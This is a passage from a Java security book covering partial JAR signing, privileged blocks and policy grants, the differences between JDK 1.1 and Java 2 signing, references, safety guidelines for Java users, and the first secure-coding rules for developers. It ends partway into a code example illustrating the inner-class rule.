    permission java.io.FilePermission "c:\\tmp\\*", "write";
};
Note the double backslashes. All Win32 pathnames must use double backslashes to indicate directories.
Unix pathnames use regular single forward slashes. The codeBase value follows URL syntax.
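The same pattern extends to other permission types. As a hedged illustration (the host name and port are hypothetical), the following additional grant entry would let applets signed by friend open a socket back to a particular server. Note that the keystore line appears only once per policy file, so it is not repeated here:

grant signedBy "friend" {
    permission java.net.SocketPermission "data.friendly.com:1099", "connect";
};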
Sign Only Privileged Code

Applets that request permission to leave the sandbox are usually built for greater purposes than saving a high-score list on the local drive. Applets that do serious business and hence require access to the local system are most likely some of the larger applets in existence. It is unlikely that these applets will be built completely by one developer or one software company. Chances are some of the components of an applet will be bits of utility code found on the Internet or purchased from a tool vendor.

A smart organization wants to sign only code that it produces; third-party utility code cannot be safely vouched for. If all the code is signed, then any code can leave the sandbox based on the policy. However, if some code in an applet is from a third party, it should not be signed unless the individual signing the code is willing to vouch that the third-party code won't try to do anything malicious (or introduce a security hole that others can exploit). To say the least, we don't recommend signing code you don't completely understand.

Java 2 presents an API for privileged blocks. Privileged blocks are meant to be small sections of code that have a higher privilege than the code that invoked them. JDK 1.2beta4 introduced a new API for privileged blocks. Using this API, the only code that needs to be signed is the code that invokes the AccessController class, and the code that performs the privileged action. All other code can remain unsigned, preventing it from leaving the sandbox on its own (or tempting others to attack it). Documentation on the new API can be found at java.sun.com/products/jdk/1.2/docs/guide/security/doprivileged.html.

There are two things to consider when writing signed code that will be integrated with unsigned code. First, make the code in the privileged block as small as possible. The less code that is privileged, the less chance that granting it higher privilege will result in nasty and unwanted side effects. Second, to prevent mix-and-match attacks, all the code for the applet should live in one JAR file, even if the third-party libraries that are used by the applet live in their own JAR. (See Guidelines for Java Developers in Chapter 7, "Java Security Guidelines: Developing and Using Java More Securely.")

To sign some portions of a JAR file and leave others unsigned takes a number of steps we'll cover now. First, create a JAR file containing all classes that need to be signed:

jar cvf MyApp.jar Signme1.class Signme2.class

List all the classes that need to be signed in the previous command. Once the JAR containing classes that need to be signed is created, sign the JAR with jarsigner.
jarsigner MyApp.jar mykey

Now, add the remainder of the classes in the application to MyApp.jar. The Java 2 version of jar added the u flag, which allows JAR files to be updated with new files.

jar uvf MyApp.jar Other1.class Others.class

List the remaining classes in the application in this step. If parts of the application are already in a JAR or ZIP file, they will need to be unarchived before being JARed into the new partially signed JAR file. To verify that all went correctly, use jarsigner to verify the contents.

jarsigner -verify -verbose MyApp.jar

Only the classes that were added before jarsigner was invoked the first time to create the signature will be marked as signed. All the other classes will be listed, but no certificate or signature will be associated with their listing. If jarsigner fails to verify the entire JAR, or classes that are supposed to be signed appear not to be, use the jar command to list the contents of the JAR.

jar tvf MyApp.jar

The first entry in the JAR must be META-INF/MANIFEST.MF. If the manifest file is missing or not in the first position in the file, the JAR will not verify properly. Following the MANIFEST.MF file should be a .SF and a .DSA (or .RSA) file. If either of those files is missing, then the signature is missing from the JAR. Remove the JAR file and start over. If the commands listed earlier still move the META-INF/MANIFEST.MF file out of the first position in the file, it may not be possible to create a JAR containing signed and unsigned code. (The jar command with JDK 1.2beta4 did not move the META-INF/MANIFEST.MF file around in the JARs we created.)
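To make the privileged-block idea concrete, here is a minimal sketch of the kind of class that would go into the signed portion of the JAR, using the doPrivileged call documented for the Java 2 API; the class name and the property being read are illustrative, not taken from any particular example of Sun's.

import java.security.AccessController;
import java.security.PrivilegedAction;

public class HomeDirLookup {
    // Only this class (and anything else that touches AccessController)
    // needs to live in the signed JAR; callers can remain unsigned.
    public static String getUserHome() {
        return (String) AccessController.doPrivileged(new PrivilegedAction() {
            public Object run() {
                // Keep the privileged action as small as possible.
                return System.getProperty("user.home");
            }
        });
    }
}

Of course, reading user.home still requires that policy grant the signed code the corresponding java.util.PropertyPermission; the privileged block only keeps unprivileged callers further up the stack from blocking the access.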
How to Sign Java Code
Section 7 -- Differences Between JDK 1.1 Code Signing and Java 2 Code Signing
There are a number of major differences between Sun's approach to code signing in JDK 1.1 and in Java 2:

1. JDK 1.1 trusts code completely or does not trust it at all; Java 2 allows policy to define what code can and cannot do. This reflects the change from black-and-white trust to shades of gray.

2. JDK 1.1 has one tool, javakey, for all code-signing-related functions; Java 2 has keytool for certificate management and jarsigner for signing and verifying JARs.

3. JDK 1.1 does not support certificates from Certificate Authorities; Java 2 does allow Certificate Authorities to sign generated certificates, although it is unclear whether any CAs currently offer this service.
How to Sign Java Code
Section 8 -- In Conclusion
Both Netscape and Microsoft have provided browser-specific methods for leaving their sandboxes. Both rely on external Certificate Authorities to manage identities, but the same certificate used for Netscape cannot be used for Microsoft. Netscape requires applets to use special classes to take advantage of code signing. Microsoft also provides a vendor-specific API for certain capabilities. Both take a similar approach when it comes to prompting the browser's user when certain applets attempt to leave the sandbox.

Sun has moved from a black-and-white security policy that allowed trusted code to do anything it wants to a shades-of-gray security policy by which only certain code from certain people can do certain things, depending upon configuration. However, in Java 2, unsigned code can be granted free rein of the system as well if the policy is configured that way. Having unsigned code play outside the sandbox is something that none of the other schemes allows.

The four Java code-signing techniques discussed in this tutorial vary in their complexity, have their own special tools for signing and key management, have different levels of support from VM to VM, and take different approaches to the user's interface to security controls. Considering that Java is meant to be a portable, mobile code system, the large number of compatibility issues surrounding code signing is worrisome. Developers want their applets to do more than the original JDK 1.0.2 sandbox model allowed, but with each vendor providing different ways for code to leave the sandbox, the goal of "sign once, leave the sandbox anywhere" seems highly unlikely.
References

Abadi, M., Burrows, M., Lampson, B., and Plotkin, G. (1993) A calculus for access control in distributed systems. ACM Transactions on Programming Languages and Systems, 15(4):706-734, September 1993.

Anderson, R. and Kuhn, M. (1996) Tamper resistance: a cautionary note. In The Second USENIX Workshop on Electronic Commerce Proceedings, pages 1-11. Also available on the Web at http://www.cl.cam.ac.uk/users/cm213/Publications/tamper.html.

Badger, L. and Kohli, M. (1995) Java: Holds great potential, but also security concerns. Data Security Letter, 3:12-15. The Data Security Letter (DSL) is published by Trusted Information Systems (TIS).

Boneh, D., DeMillo, A., and Lipton, R. (1997) On the importance of checking cryptographic protocols for faults. In W. Fumy (ed.) Advances in Cryptology: Eurocrypt '97, Volume 1233 of Lecture Notes in Computer Science, pages 37-51, Springer-Verlag. Also available on the Web at http://theory.stanford.edu/~dabo/papers/faults.ps.gz.

CERT (1996a) CA-96.05: Java applet security manager. See URL http://www.cert.org/advisories/index.html.

CERT (1996b) CA-96.07: Java Security bytecode verifier. See URL http://www.cert.org/advisories/index.html.

Daconta, M. (1996) Java for C++ Programmers. John Wiley & Sons, New York.

Dean, D., Felten, E., and Wallach, D. (1996) Java Security: From HotJava to Netscape and Beyond. In Proceedings of the 1996 IEEE Symposium on Security and Privacy, Oakland, CA.

Dean, D. (1998) Formal Aspects of Mobile Code Security. Ph.D. dissertation, Department of Computer Science, Princeton University.

Drossopoulou, S. and Eisenbach, S. (1998) Towards an Operational Semantics and Proof of Type Soundness for Java. A technical paper to be included in an as yet unnamed book. Available on the Web at http://outoften.doc.ic.ac.uk/projects/slurp/papers.html.

Erdos, M., Hartman, B., and Mueller, M. (1996) Security Reference Model for the Java Developer's Kit 1.0.2. Available from Sun Microsystems and also as a Web document on-line at http://www.javasoft.com/security/SRM.html.

Felleisen, M. and Friedman, D. (1998) A Little Java, A Few Patterns. MIT Press, Cambridge, MA.

Felten, E., Balfanz, D., Dean, D., and Wallach, D. (1997) Web Spoofing: An Internet con game. In Proceedings of the 20th National Information Systems Security Conference, Baltimore, MD. An early version appeared as technical report 540-96 (revised), Department of Computer Science, Princeton University.

Flanagan, D. (1997) Java in a Nutshell, second edition. O'Reilly & Associates, Sebastopol, CA.

Flanagan, D. (1997) Java Examples in a Nutshell. O'Reilly & Associates, Sebastopol, CA.

Friedman, D., Wand, M., and Haynes, C. (1992) Essentials of Programming Languages. MIT Press/McGraw-Hill, Cambridge, MA.

Garfinkel, S. and Spafford, G. (1996) Practical Unix & Internet Security, second edition. O'Reilly & Associates, Sebastopol, CA.

Ghosh, A. (1998) E-Commerce Security: Weak Links, Best Defenses. John Wiley & Sons, New York.

Gong, L., Mueller, M., Prafullchandra, H., and Schemers, R. (1997) Going Beyond the Sandbox: An overview of the new security architecture in the Java Development Kit 1.2. In Proceedings of the USENIX Symposium on Internet Technologies and Systems, Monterey, CA.

Gong, L. and Schemers, R. (1998) Implementing Protection Domains in the Java Development Kit 1.2. In Proceedings of the Internet Society Symposium on Network and Distributed System Security, San Diego, CA.

Hastings, R. and Joyce, B. (1992) Purify: Fast detection of memory leaks and access errors. In Proceedings of the Winter USENIX Conference, ACM Press.
Horstmann, C. and Cornell, G. (1997) Core Java Volume I: Fundamentals. SunSoft Press, Mountain View, CA.

Hughes, L.J. (1995) Actually Useful Internet Security Techniques. New Riders, Indianapolis.

Hughes, M., Shoffner, M., and Winslow, M. (1997) Java Network Programming. Manning.

ISO7816 (1987) International Standards Organization, International Standard ISO 7816-1 through 7816-6, "Identification cards: Integrated circuit(s) cards with contacts". Available through ISO, New York.

LaDue, M. (1996) Java Security: Whose business is it? Published by Online Business Consultants and available as a Web document on-line at http://www.rstcorp.com/hostile-applets/OBCArticle/Article.html.

Lewis, T. (1996) What's wrong with Java? IEEE Software, 29(6):8. Lewis's letter to the editor was in response to Java criticism originally printed by him in The NC phenomena: Scenes from your living room, IEEE Software, 29(6):8-10.

Lewis, T. (1998) Java Holy War '98. IEEE Computer, 31(3):126-128.

Macgregor, R., Durbin, D., Owlett, J., and Yeomans, A. (1998) Java Network Security. Prentice Hall, Saddle River, NJ.

Martin, D., Rajagopalan, S., and Rubin, A. (1997) Blocking Java Applets at the Firewall. In Proceedings of the 1997 Network and Distributed System Security Symposium, San Diego, March 1997. Also available on the Web at http://www.cs.bu.edu/techreports/96-026-java-firewalls.ps.Z.

McGraw, G. and Felten, E. (1996) Java Security: Hostile Applets, Holes, and Antidotes. John Wiley & Sons, New York. (The first edition of this book.)

McGraw, G. (1998) Testing for security during development: why we should scrap penetrate and patch. IEEE Aerospace and Electronic Systems, 13(4):13-15, April 1998.

Neumann, P. (1995) Computer Related Risks. Addison-Wesley, Reading, MA.

Oaks, S. (1998) Java Security. O'Reilly & Associates, Sebastopol, CA.

Rubin, A., Geer, D., and Ranum, M. (1997) The Web Security Sourcebook. John Wiley & Sons, New York.

Schneier, B. (1995) Applied Cryptography: Protocols, Algorithms, and Source Code in C, second edition. John Wiley & Sons, New York.

Shimomura, T. and Markoff, J. (1996) Takedown: The Pursuit and Capture of Kevin Mitnick, America's Most Wanted Computer Outlaw, By the Man Who Did It. Hyperion, New York.

Spafford, E. (1989) The Internet worm program: An analysis. Computer Communications Review, 19(1):17-57.

Stata, R. and Abadi, M. (1998) A type system for Java bytecode subroutines. In Proceedings of the 25th ACM Symposium on Principles of Programming Languages, pages 149-160, January 1998.

Sun Microsystems (1995) The Java Language: An Overview. Available from Sun and also as a Web document on-line at http://java.sun.com/docs/overviews/java/java-overview-1.html.

Sun Microsystems (1996b) The Java Virtual Machine Specification. Web document at URL http://www.javasoft.com/docs/books/vmspec/html/VMSpecTOC.doc.html. Available as a book by Lindholm and Yellin from Addison-Wesley.

Sun Microsystems (1996c) Low-level security in Java. Web document at URL http://www.javasoft.com/sfaq/verifier.html by Frank Yellin.

Sun Microsystems (1997) Java Card 2.0 programming concepts, revision 1.0 final. Web document at URL http://www.javasoft.com/products/javacard/index.html.

Venners, B. (1998) Inside the Java Virtual Machine. McGraw-Hill, New York.

Voas, J. and McGraw, G. (1998) Software Fault Injection: Inoculating Programs Against Errors. John Wiley & Sons, New York. See the Web site at http://www.rstcorp.com/books/sfi/.

Wallach, D., Balfanz, D., Dean, D., and Felten, E. (1997) Extensible Security Architectures for Java. In Proceedings of the 16th Symposium on Operating Systems Principles (Saint-Malo, France), October 1997.

Wallach, D. and Felten, E. (1998) Understanding Java Stack Inspection. In Proceedings of the 1998 IEEE Symposium on Security and Privacy, Oakland, CA.

Wallach, D. (1998) A New Approach to Mobile Code Security. Ph.D. dissertation, Department of Computer Science, Princeton University.

Young, Boebert, and Kain (1985) Article in an IEEE Tutorial on Computer Network Security. IEEE Press.
Web sites Referenced in the Text
All of the following links can be found on a page of the companion Web site for this book at www.securingjava.com.
Chapter 1 Don't Push Me: The Security Implications of Push. developer.com TechFocus article by Gary McGraw. Java Developer's Kit (JDK) available free from Javasoft. Also other official Java information. Javasoft's Frequently Asked Questions: Applet Security Security Tradeoffs: Java versus ActiveX. Princeton Safe Internet Programming FAQ. Also see Appendix A. JavaScript Problems I've Discovered. John LoVerso's JavaScript Security site. developer.com, an on-line publication for Java developers. JavaWorld, an on-line publication for Java enthusiasts and developers. MindQ, an on-line training company specializing in Java. Yahoo! An excellent starting point for Web surfing. A large Web index. AltaVista. One of the top search engines on the Web. Java Security Hotlist. Also see Appendix B. Princeton's Secure Internet Programming Team. Includes the Java Security FAQ. The Java Books list. An extensive list of all books published about Java (way too many). The Java Security Web Site. This book's companion Web site. Includes the Java Security Hotlist.
Chapter 2 The Hostile Applets Home Page, a collection of hostile applets written by Mark LaDue.
Chapter 3
Understanding Java Stack Inspection by Wallach and Felten. Sun's document explaining the security API change.
Chapter 4 The Hostile Applets Home Page DigiCrime (disable Java and JavaScript before you surf this site) The Java Security Hotlist: Hostile Applets and Other Toys Digicrime's Blue Screen of Death page. The actual byte code of the bluescreen applet. Ahpah Software makes the SourceAgain decompiler. Earthweb's Java applet database. Sun Microsystem's Frequently Asked Questions - Java Security Princeton's Java Security: Frequently Asked Questions (included as Appendix A) Princeton's Security Tradeoffs: Java vs. ActiveX (included as Appendix A) The Java Security Web Site, companion Web site for this book
Chapter 5 An archive of the security-related bugtraq archive Javasoft's Frequently Asked Questions: Java Security Princeton Secure Internet Programming Team's Java Security FAQ. Also see Appendix A. Major Malfunction and Ben Laurie explain the security holes they discovered Princeton's Secure Internet Programming Team University of Washington's Kimera Project
Type safety problems discovered in Sun's Verifier by the Kimera Project
Ben Mesander's applet WhereDoYouWantToGoToday
Chapter 6 Princeton's seminal paper, Java Security: From HotJava to Netscape and Beyond Formalizing the JVM at Computational Logic, Inc. Javasoft's Security Reference Model for JDK 1.0.2 The Jasmin byte code assembler Ahpah Software sells the SourceAgain Java Decompiler Finjan Software, Ltd. Mark LaDue takes on Finjan Mark LaDue takes on Finjan again Digitivity Security7 WithinReach Cult of the Dead Cow produces the Back Orifice exploit esafe Princeton Secure Internet Programming Team's Java Filter Class Loader International Computer Security Association Marcus Ranum discusses firewall certification Mark LaDue's Hostile Applet Mutation Generator
Chapter 7 The Java Security Web Site, companion site for this book The Java Security Hotlist Sun's Java Security FAQ Martin et al.'s paper Blocking Java Applets at the Firewall
Chapter 8
Gemplus: JavaCard and GemXpresso
Schlumberger: Cyberflex
Javasoft: Java Card Technology; specifications for Card Java can be found here
Boneh, DeMillo, and Lipton's On the Importance of Checking Cryptographic Protocols for Faults
Anderson and Kuhn's Tamper Resistance: A Cautionary Note
Cryptography Research, Inc. information on Differential Power Analysis
Java Card Security: How Smart Cards and Java Mix
We emphasize throughout this book that Java is much more than simply a programming language. This chapter takes that lesson to heart and discusses Java's role in a technology destined to become part of all our lives in the near future: smart cards. In light of its history as a platform for embedded devices, it's a bit ironic, but not surprising, that in one of its many forms, Java is coming full circle back to its embedded roots.

Smart cards provide an important enabling technology for e-commerce. They are integral building blocks in many systems currently on the drawing board and a few systems already in service. Java can help make smart cards more accessible to developers and business people by providing a well-understood, familiar environment. One of the barriers blocking the adoption of smart cards throughout the world has been the lack of a common platform on which to develop applications. Java can help dismantle that barrier, opening a world of potential development opportunities to Java developers and cutting-edge organizations.

This chapter answers a number of questions about Java-based smart cards, including:

● What is a smart card?
● Why put Java on a smart card?
● How can Java fit on a card?
● How secure are smart cards?
● What role can smart cards play in e-commerce systems?
● How does the use of Java impact smart card security?
These questions are important ones to ask since smart cards have already started appearing in consumer wallets, especially in Europe.
Chapter Eight Sections
1. Java Security Goes Both Ways
2. What Is a Smart Card?
3. Why Put Java on a Smart Card?
4. How Can Java Fit on a Card?
5. How Secure Are Smart Cards?
6. What Role Can Smart Cards Play in E-Commerce Systems?
7. How Does the Use of Java Impact Smart Card Security?
8. Managing Risks
Java Security Guidelines: Developing and Using Java More Securely
Section 3 -- Guidelines Are Never Perfect
The guidelines included in this chapter can help you develop more secure code and use Java more securely, but in the end, they can't guarantee anything about security. Following the two sets of guidelines is probably a good idea, but risks will always remain, no matter how vigilant you are. Plan accordingly.

If you are doing business on the Net, be particularly careful. The stakes change significantly when it comes to electronic commerce. An appropriate introduction to the security dangers inherent in e-commerce is Anup Ghosh's book, E-Commerce Security [Ghosh, 1998]. Whatever you do, pay close attention to the tradeoffs between functionality and risk. We make security and safety tradeoffs every day when we leave the house, and often they are very appropriate. Making these decisions is more reasonable when you know about potential pitfalls.
Java Security Guidelines: Developing and Using Java More Securely
Section 2 -- Guidelines for Java Users
It is all well and good to talk about what can be done to improve the next version of Java, or how you as a developer can create safer code, but what can a regular Java user do to stay safe? Are there guidelines for safely using Java as it exists today? There are several straightforward things you can do to make your use of Java safer. Most of these are based on good old-fashioned common sense; others require a bit of knowledge about Java. We have compiled a set of guidelines from the other chapters and have organized them here.

● Know what Web sites you are visiting.
● Learn as much as you can about Java security.
● Know your Java environment.
● Use up-to-date browsers with the latest security updates.
● Keep a lookout for security alerts.
● Apply drastic measures if your information is truly critical.
● Assess your risks.
Know What Web Sites You Are Visiting

The first piece of advice we have is of the common-sense variety: Know what sorts of sites you are visiting with your Web browser. The chances of being attacked by an applet from a large corporate site like www.sun.com are minimal. The chances of suffering an attack while surfing an underground cracker Web page are, of course, much greater. Not all dangerous Web sites are run by bad guys, however. One interesting cracker strategy might be
to hack a Web server in a very public fashion (something that has been done to the U.S. Department of Justice, the U.S. Air Force, and the Central Intelligence Agency, among others [Ghosh, 1998]), but add a twist. The media coverage will cause many thousands of people to surf to the hacked site to "check it out." Here's where an attack applet would do the most damage! Since the Web server has been hacked, the cracker figures, why not install some mobile code that attacks all surfers indiscriminately? All the curiosity seekers thus become de facto targets. In any case, there are certainly unsafe places on the Web. An analogy may be useful here. Both of the authors are sorry to admit they drive minivans. There are places in a large city such as Washington, D.C. where no one in his or her right mind would drive a minivan. Just as you shouldn't drive your minivan in certain areas of the city, you shouldn't drive your Java-enabled browser to certain areas of the Web. You can avoid risk-laden Web sites by employing the same strategy you would use when visiting a big city. Use your intuition to assess your environment continually when you surf. If you are tempted to visit some cracker Web sites, do so with Java turned off. (Actually, make sure that all types of executable content are disabled when visiting such sites!) The Internet and the Web are reflections of society, no more and no less. There are sites that reflect the pinnacle of what people can achieve, and there are those that reflect the depths to which people can lower themselves. Know that just as there are bad people who rob banks and mug people in the real world, there are bad people on the Web. Some of these people create traps to prey on unsuspecting surfers. Depending on your level of paranoia, you might consider all unknown Web sites as risky locations. A good strategy might be to leave Java off by default and turn it on only when you make a conscious decision to trust a site. Many business sites require that their employees use Java this way. This strategy is easy to implement. We discussed how to disable and enable Java on two popular browsers in Chapter 4, "Malicious Applets: Avoiding a Common Nuisance." This guideline takes on more weight as the world rushes into electronic commerce. If your PC has data on it that help you transact business over the Net (such as trading stocks) then you need to be concerned about computer security. The addition of money (virtual or not) to the Net changes the stakes significantly.
Learn as Much as You Can about Java Security

By reading this book, you are off to a good start. Keep in mind, however, that Java security is a fast-moving field. Since Java's introduction in 1996, the security landscape has changed dramatically:

● Tens of millions more people are connected to the Internet.
● Java has undergone two major releases.
● The security model has evolved to include signed applets.
There is no reason to believe that Java's evolution will slow. In fact, Java's quick move to maturity is essential to its long-term viability as a language. One way to keep abreast of Java security happenings is to sign up for notification of breaking Java security news. On this book's companion Web site at www.rstcorp.com/java-security.html, you can submit a form to be added to our notification mailing list. Note that this list will not be sold, rented, or otherwise shared with anyone other than the authors. We promise. We hate spam as much as anyone! You should also keep tabs on the Java Security Hotlist (see Appendix B, "The Java Security Hotlist," and www.rstcorp.com/javasecurity/links.html).
Know Your Java Environment

Another piece of common-sense advice is to know about the Java tools that you are using. Know how Java works (this book should help). Now that you know how Java treats signed classes with privilege, you know how important it is to consider carefully what your security policy looks like and who created it. Also be aware that early versions of Java (including JDK 1.1) allow built-in code full power to do anything. Before Java 2, built-in classes were allowed to bypass all security verification checks. If you are using a browser that does not yet support Java 2, never put Java classes (or .jar archives of classes) in your CLASSPATH unless you fully trust the vendor that distributed them. Also be aware that any subdirectories under the directories in your CLASSPATH may be searched for a class as well. Know who built your Java libraries and tools.

Similarly, do not install or otherwise change your Java security policy under the influence of a vendor or other mobile code distributor. A potential social engineering attack against a site running Java 2 could involve convincing a user to redefine security policy in order to run some cool Java code. If you must change policy, think long and hard about why and about who you may be trusting.

Be aware of what Java version you are using. Several companies have licensed the right to produce Java development environments. Some probably do a better job with security than others. If the Java VM is buggy, then Java security is compromised. By using a particular vendor's version of Java, you are trusting the security of your machine to them. This is actually a general lesson that applies to many technologies. Browser plugins should be subject to similar scrutiny. So, too, should any executable binaries loaded from the Internet.

Finally, find out who controls your browser's Java security policy. Some corporate users may be surprised to learn that they are not in control of their surfing security policy. Starting with version 4, both Netscape
Navigator and Microsoft Internet Explorer allow a system administrator to set security policy and lock it in so that it cannot be overridden by users. Some sites attempt to block Java and other mobile code traffic at the firewall (although see Chapter 6, "Securing Java: Improvements, Solutions, and Snake Oil"). If you do control your own policy, make sure you set up a policy that is sound and coherent. Be aware that setting up a security policy is nontrivial and often leads to subtle errors.
Use Up-to-Date Browsers with the Latest Security Updates

This guideline may be a bit counterintuitive, but you should always use the latest version of your favorite browser, even if it is a beta version. All of the security holes discussed in Chapter 5, "Attack Applets: Exploiting Holes in the Security Model," have been fixed in the very latest versions of Netscape and Internet Explorer. Be aware that the early releases are not updated to fix bugs, which implies that the latest (beta) versions are more secure. Of course, beta versions may also have new bugs of their own.

Recall that although the Princeton Class Loader attack has been fixed for most versions of Netscape (see Applets Running Wild in Chapter 5), the problem persists in version 2.0. The same thing goes for the Jumping-the-Firewall attack. Counting on an old version of a browser for your security is probably not a good idea. Use the next guideline to help determine which version of a browser you need to have. Then get it.
Keep a Lookout for Security Alerts

Every once in a while, check the latest security information on Java. This book's companion Web site (www.securingjava.com) is quite current, but you should also keep an eye on the Sun Microsystems official Java Security FAQ. Also, have someone in your organization (or someone in your group of friends) subscribe to the CERT Alert list. If the CERT Coordination Center finds a security hole either particularly egregious or particularly popular among crackers, they will warn the community at large.

To date, CERT has issued two security alerts about Java. Both were related to attacks found by the Princeton team. The alerts were reprinted in Appendix B of Java Security: Hostile Applets, Holes, & Antidotes (the first edition of this book), where you will also find information about signing up for online delivery of CERT Alerts. The CERT Alerts have the advantage of telling you the status of any security attacks and how to avoid them. For Java, this includes information about which browser versions are susceptible to a particular attack and which versions have been patched.
More Drastic Measures

There are, of course, a couple of drastic measures that can be applied to lessen Java security risks. These both involve not using Java. These drastic alternatives are not called for unless your information is ultracritical. If you determine that the risks described are simply too great for you to bear, you can implement these strategies.
Stopping Java at the Firewall

Many firewall vendors claim to have added the capability of stopping Java applets at the gate by using special firewall products. Some firewalls block Java applets by parsing a Web page's HTML code as it arrives. This action is typically performed by the HTTP proxy. HTML-parsing capability makes a firewall capable of blocking any HTML-related tag. Thus, the relevant proxy can cut out Java (by looking for the <APPLET> tag), JavaScript, and even old HTML 2.0 tags that are deemed disallowed during setup. This strategy is useful only for HTML coming in through the proxy via HTTP. That means that applets coming into the system in other ways (for example, through SSL or via ftp) can still get through.

Another solution to the same problem might be to try to stop all files with a .class extension at the gate. Still another would be to scan all incoming binaries for the magic number each applet is required to have. The end result is the same: No applets are allowed past the firewall.

Research results show that stopping mobile code is much more difficult than it may seem at first glance. An excellent technical paper entitled Blocking Java Applets at the Firewall by David Martin (Boston University), S. Rajagopalan (Bellcore), and Avi Rubin (ATT Research) can be downloaded from www.cs.bu.edu/techreports/96-026-java-firewalls.ps.Z (or see the Java Security Hotlist).

Stopping all applets at the firewall is a radical solution that gives up all the good things that Java has to offer. It may be a viable alternative for machines that require limited Web access but are considered too important to expose to any risk beyond that. Unfortunately, this strategy resembles throwing the baby out with the bath water.
Hiding Under the Bed

Believe it or not, there are strategies even more paranoid than blocking applets at the firewall. Some sites may have such sensitive information that they decide they can't afford to take any risks at all. These sites protect themselves by not even connecting to the Internet in the first place. Java risk is thoroughly countered by this strategy, but all of the benefits that come with being connected to the Internet are given up in return. Java's power and flexibility may still find room on such a company's intranet, but there will certainly be fewer uses for Java.
Java Security Guidelines: Developing and Using Java More Securely
Section 1 -- Guidelines for Java Developers
This section introduces 12 rules for writing security-critical Java code; 12 rules that all Java developers should abide by. If you are charged with managing a gaggle of Java developers, or if your business relies on the security of Java, make sure your developers follow these rules. These rules have not been sugar-coated for mass consumption. They get fairly technical and require broad knowledge of Java. Although experienced Java developers will understand all of the rules, less-experienced Java developers may have a bit of homework to do. Nevertheless, these rules are important and can make your Java code more secure. The rules listed here were built on the experiences of many people who have generously discussed their experiences in building secure Java code. We are particularly grateful to Andrew Appel, Dirk Balfanz, Drew Dean, and Dan Wallach, of the Secure Internet Programming Team at Princeton, for helping us understand these issues. Others who have contributed significantly to the behind-the-scenes thinking that went into these rules include David Hopwood, Li Gong, and Jim Roskind. The rules are based on much experience in hunting down Java security bugs, and on advice and observations from people who write and review security-critical Java code for a living. Each rule is designed to eliminate an unexpected "gotcha" that you might face. Of course, security is an elusive goal, and following these rules certainly won't provide any guarantee that your code is secure. It is easy to write insecure code that follows these rules. The goal of these rules is not to guarantee security, but to eliminate certain kinds of security attacks that you might not have thought of. If you follow these rules, certain kinds of attacks will be impossible; other kinds will still be possible. So think of these rules as a first step. If you are writing code that may be linked or run in conjunction with untrusted code, then you should definitely consider following these rules. Every attempt was made to keep the rules simple enough that you can treat them as a checklist to be
followed in mechanical fashion. That way, you can save your brainpower for other security issues.
Rule 1: Don't Depend on Initialization

Most Java developers think that there is no way to allocate an object without running a constructor. This is not true: There are several ways to allocate uninitialized objects. The easy way to protect yourself against this problem is to write your classes so that before any object does anything, it verifies that it has been initialized. You can do this as follows (a minimal sketch appears after the list):

● Make all variables private. If you want to allow outside code to access variables in an object, this should be done via get/set methods. (This keeps outside code from accessing uninitialized variables.) If you're following Rule 3, you'll make the get and set methods final.
● Add a new private boolean variable, called initialized, to each object.
● Have each constructor set the initialized variable as its last action before returning.
● Have each nonconstructor method verify that initialized is true, before doing anything. (Note that you may have to make exceptions to this rule for methods that are called by your constructors. If you do this, it is best to make the constructors call only private methods.)

If your class has a static initializer, you will need to do the same thing at the class level. Specifically, for any class that has a static initializer, follow these steps:

● Make all static variables private. If you want to allow outside code to access static variables in the class, this should be done via static get/set methods. This keeps outside code from accessing uninitialized static variables. If you're following Rule 3, you'll make the get and set methods final.
● Add a new private static boolean variable, called classInitialized, to the class.
● Have the static constructor set the classInitialized variable as its last action before returning.
● Have each static method, and each constructor, verify that classInitialized is true, before doing anything. (Note: Constructors are required to call a constructor of the superclass or another constructor of the same class as their first action. Therefore, you will have to do that before you check classInitialized.)
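The following minimal sketch shows the object-level half of this pattern for a hypothetical class; the class name and its method are ours, not part of the rule itself.

public class Wallet {
    private double balance;                  // Rule 2: everything private
    private boolean initialized = false;     // set only by the constructor

    public Wallet(double openingBalance) {
        balance = openingBalance;
        initialized = true;                  // last action before returning
    }

    public final double getBalance() {       // Rule 3: final accessor
        if (!initialized) {
            throw new IllegalStateException("uninitialized object");
        }
        return balance;
    }
}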
Rule 2: Limit Access to Your Classes, Methods, and Variables

Every class, method, and variable that is not private provides a potential entry point for an attacker. By default, everything should be private. Make something non-private only if there is a good reason, and document that reason.
Rule 3: Make Everything Final, Unless There's a Good Reason Not To
If a class or method is non-final, an attacker could try to extend it in a dangerous and unforeseen way. By default, everything should be final. Make something non-final only if there is a good reason, and document that reason. You might think that you can prevent an attacker from extending your class or its methods by declaring the class non-public. However, if a class is not public, it must be accessible from within the same package, and as we shall see, Rule 4 says not to rely on package-scope access restrictions for security. This advice may seem harsh. After all, the rule is asking you to give up extensibility, which is one of the main benefits of using an object-oriented language like Java. When you're trying to provide security, however, extensibility is your enemy; it just provides an attacker with more ways to cause trouble.
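As a minimal sketch (the class name is ours), a security-sensitive class written under Rules 2 and 3 ends up looking like this:

import java.util.Vector;

public final class AuditLog {                    // final class: cannot be extended
    private final Vector entries = new Vector(); // Rule 2: data stays private

    public final void record(String entry) {     // redundant in a final class, but explicit
        entries.addElement(entry);
    }
}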
Rule 4: Don't Depend on Package Scope Classes, methods, and variables that are not explicitly labeled as public, private, or protected are accessible within the same package. Don't rely on this for security. Java classes are not closed, so an attacker could introduce a new class inside your package, and use this new class to access the things you thought you were hiding. (A few packages, such as java.lang, are closed by default, and a few JVMs let you close your own packages. However, you're better off assuming that packages are not closed.) Package scope makes a lot of sense from a software-engineering standpoint, since it prevents innocent, accidental access to things that you want to hide. But don't depend on it for security. Maybe we'll get sealed classes in the future.
Rule 5: Don't Use Inner Classes Some Java language books say that inner classes can only be accessed by the outer classes that enclose them. This is not true. Java byte code has no concept of inner classes, so inner classes are translated by the compiler into ordinary classes that happen to be accessible to any code in the same package. And Rule 4 says not to depend on package scope for protection. But wait, it gets worse. An inner class gets access to the fields of the enclosing outer class, even if these fields are declared private. And the inner class is translated into a separate class. In order to allow this separate class access to the fields of the outer class, the compiler silently changes these fields from private to package scope! It's bad enough that the inner class is exposed, but it's even worse that the compiler is silently overruling your decision to make some fields private. Don't use inner classes if you can help it. (Ironically, the new Java 2 doPrivileged() API usage guidelines suggest that you use an inner class to write privileged code. That's one reason we don't like the doPrivileged() API.)
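To make the exposure concrete, here is a small illustration (hypothetical names, not code from this book) of the pattern Rule 5 warns about. The field is declared private, but because Inner is compiled into a separate class, 1.1-era compilers quietly widened access to secret so that the generated Outer$Inner class could reach it.

public class Outer {
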